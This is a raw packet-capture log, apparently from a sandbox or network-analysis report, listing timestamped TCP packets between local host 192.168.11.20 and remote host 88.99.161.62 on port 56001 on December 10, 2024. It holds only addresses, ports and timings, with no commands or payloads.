                                                                              Dec 10, 2024 07:01:53.953110933 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.036737919 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.036801100 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.036832094 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.101181030 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.101286888 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.168420076 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.168463945 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.168489933 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.256978989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.257138968 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.316725016 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.316860914 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.387089014 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.387171030 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.472620964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.472692966 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.472722054 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.518760920 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.518929005 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.602560997 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.602727890 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.602758884 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.654551983 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.654637098 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.734266043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.734599113 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.801780939 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.801950932 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.869884968 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.870146990 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.870332003 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:54.942635059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:54.942739010 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.017047882 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.017501116 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.017637014 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.085478067 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.085586071 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.158353090 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.158376932 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.218689919 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.218795061 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.300776005 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.300849915 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.300878048 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.301245928 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.372080088 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.372191906 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.434377909 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.434428930 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.434457064 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.434704065 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.504638910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.504807949 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.587744951 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.587785959 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.588073969 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.653331041 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.720115900 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.720191002 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.720220089 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.720779896 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.789088011 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.789202929 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.868886948 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.868962049 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.868989944 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.869731903 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:55.922055006 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:55.922224045 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.004838943 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.004883051 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.071582079 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.137759924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.137801886 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.137828112 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.138106108 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.207072973 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.207207918 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.287280083 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.287324905 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.287350893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.356798887 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.422643900 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.422884941 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.486666918 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.486823082 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.572424889 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.572669983 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.623120070 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.702372074 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.702415943 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.702444077 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.755407095 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.755512953 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.838695049 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.839001894 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.888133049 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.888228893 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:56.971074104 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.971121073 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:56.971251011 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.023644924 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.103656054 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.103894949 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.104139090 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.154189110 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.154306889 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.239356041 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.239401102 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.288717985 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.369746923 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.370074034 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.426934958 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.427104950 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.504407883 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.504443884 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.504667044 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.527189970 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.572119951 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.642364979 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.642657995 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.706610918 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.706772089 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.783521891 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.783688068 CET4976356001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.791727066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.791768074 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.845200062 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.922157049 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.922316074 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.922355890 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:57.981497049 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:57.981662989 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.040266991 CET560014976388.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.060478926 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.060519934 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.060759068 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.060798883 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.110651970 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.110735893 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.196994066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.197072029 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.197103024 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.197465897 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.238756895 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.238924026 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.326303005 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.326390982 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.326419115 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.389219999 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.389324903 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.454724073 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.523030996 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.523221970 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.604832888 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.604877949 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.604923964 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.658118010 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.658200979 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.738711119 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.738775015 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.739015102 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.792032003 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.792203903 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:58.873630047 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.873652935 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.873780966 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:58.926059961 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.007519960 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.007775068 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.008013010 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.060647011 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.141629934 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.141674042 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.189938068 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.190089941 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.276166916 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.276447058 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.307408094 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.307473898 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.405499935 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.405946970 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.442190886 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.442318916 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.522999048 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.523072958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.559568882 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.559680939 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.657773018 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.657845974 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.658221006 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.691385984 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.691518068 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.775053024 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.775346041 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.775384903 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.808484077 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.808526993 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.907069921 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.907080889 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:01:59.944005966 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:01:59.944073915 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.023808002 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.023818016 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.023969889 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.060127020 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.159707069 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.194709063 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.194833994 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.275464058 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.275475979 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.275482893 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.310695887 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.310743093 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.410000086 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.410072088 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.410100937 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.448134899 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.448288918 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.525928974 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.526062965 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.576471090 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.663697958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.663738966 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.663800001 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.709059954 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.709249973 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.792027950 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.792190075 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.826613903 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.826711893 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.924559116 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.924571037 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.924705029 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.924721956 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:00.958146095 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:00.958249092 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.041918993 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.042027950 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.042057991 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.042414904 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.078731060 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.078906059 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.173855066 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.173897028 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.173923969 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.211642981 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.211811066 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.298683882 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.298727036 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.325387955 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.427270889 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.427340031 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.427370071 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.461880922 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.462001085 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.541189909 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.541235924 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.541261911 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.577430964 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.677357912 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.677771091 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.710385084 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.710514069 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.793129921 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.793173075 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.793199062 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.827708006 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:01.925901890 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.925925016 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.926069021 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:01.959495068 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.042978048 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.042989016 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.043344021 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.078303099 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.174870014 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.174913883 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.175009012 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.214155912 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.293822050 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.347388983 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.347547054 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.429693937 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.430023909 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.483700037 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.483864069 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.562916040 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.562990904 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.563124895 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.614444017 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.614613056 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.699230909 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.699326992 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.699470043 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.727103949 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.830132008 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.830143929 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.830151081 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.830326080 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.847791910 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.942545891 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.942990065 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:02.984028101 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:02.984189987 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.063225031 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.063236952 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.063242912 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.063249111 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.109998941 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.110200882 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.199301958 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.199425936 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.199525118 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.228498936 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.325392008 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.325402975 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.325563908 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.344358921 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.344557047 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.443815947 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.443928957 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.443938017 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.461087942 CET4976256001192.168.11.2088.99.161.62
                                                                              Dec 10, 2024 07:02:03.559664011 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.559679985 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.559958935 CET560014976288.99.161.62192.168.11.20
                                                                              Dec 10, 2024 07:02:03.560065985 CET560014976288.99.161.62192.168.11.20
